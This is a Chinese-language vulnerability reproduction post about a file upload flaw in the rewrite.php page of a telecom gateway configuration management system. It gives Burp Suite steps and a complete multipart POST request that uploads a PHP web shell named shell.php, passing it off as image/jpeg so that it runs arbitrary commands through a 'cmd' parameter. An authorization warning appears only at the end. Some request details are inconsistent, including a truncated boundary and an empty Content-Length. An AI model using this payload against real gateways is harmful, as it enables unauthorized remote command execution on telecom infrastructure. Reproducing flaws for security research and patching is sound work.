【漏洞复现】电信网关配置管理系统 rewrite.php 文件上传漏洞
要复现这个漏洞,你需要一个运行电信网关配置管理系统的环境,并且rewrite.php
文件存在上传漏洞。以下是使用Burp Suite进行复现的基本步骤:
- 启动目标网关配置管理系统。
- 打开Burp Suite代理(如已设置好)。
- 尝试访问带有已知漏洞的
rewrite.php
文件。 - 当出现文件上传界面时,开始捕获流量。
- 构造一个上传请求,包含文件类型为
image/jpeg
(或其他合法类型)和恶意PHP代码。 - 发送请求至服务器。
- 如果服务器处理了恶意代码,检查服务器上是否存在恶意文件,并且是否可以执行。
以下是一个利用Burp Suite进行文件上传的示例请求(headers部分):
POST /cgi-bin/rewrite.php HTTP/1.1
Host: your-gateway-host.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------
Content-Length:
Origin: http://your-gateway-host.com
Connection: close
Referer: http://your-gateway-host.com/cgi-bin/rewrite.php
Cookie: PHPSESSID=your_session_id
Upgrade-Insecure-Requests: 1
-----------------------------
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/jpeg
<?php system($_REQUEST['cmd']); ?>
-----------------------------
Content-Disposition: form-data; name="action"
upload
-----------------------------1213815701128629118109011--
请注意,你需要替换your-gateway-host.com
为目标网关的实际主机名或IP地址,your_session_id
为实际的会话ID,以及将文件内容替换为恶意PHP代码。
复现该漏洞时,请确保你有权限在目标服务器上执行文件上传,并且在完成后清理服务器上的恶意文件。不要在未经授权的系统上进行测试,这可能违反计算机安全法律法规。
评论已关闭